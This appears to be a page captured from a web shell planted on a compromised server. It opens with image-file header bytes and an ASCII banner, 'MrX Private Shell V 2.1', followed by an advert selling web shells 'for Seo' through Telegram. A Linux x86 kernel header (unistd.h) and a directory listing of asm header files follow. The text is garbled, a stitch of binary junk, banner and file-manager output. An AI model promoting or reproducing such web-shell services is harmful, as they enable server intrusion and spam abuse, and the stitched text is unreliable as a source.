����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef _UAPI_ASM_X86_UNISTD_H #define _UAPI_ASM_X86_UNISTD_H /* * x32 syscall flag bit. Some user programs expect syscall NR macros * and __X32_SYSCALL_BIT to have type int, even though syscall numbers * are, for practical purposes, unsigned long. * * Fortunately, expressions like (nr & ~__X32_SYSCALL_BIT) do the right * thing regardless. */ #define __X32_SYSCALL_BIT 0x40000000 #ifndef __KERNEL__ # ifdef __i386__ # include <asm/unistd_32.h> # elif defined(__ILP32__) # include <asm/unistd_x32.h> # else # include <asm/unistd_64.h> # endif #endif #endif /* _UAPI_ASM_X86_UNISTD_H */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| bitsperlong.h | File | 320 B | 0644 |
|
| errno.h | File | 31 B | 0644 |
|
| kvm.h | File | 20.42 KB | 0644 |
|
| kvm_perf.h | File | 388 B | 0644 |
|
| mman.h | File | 214 B | 0644 |
|
| perf_regs.h | File | 1.37 KB | 0644 |
|
| svm.h | File | 9.6 KB | 0644 |
|
| unistd.h | File | 664 B | 0644 |
|
| unistd_32.h | File | 559 B | 0644 |
|
| unistd_64.h | File | 561 B | 0644 |
|
| vmx.h | File | 7.3 KB | 0644 |
|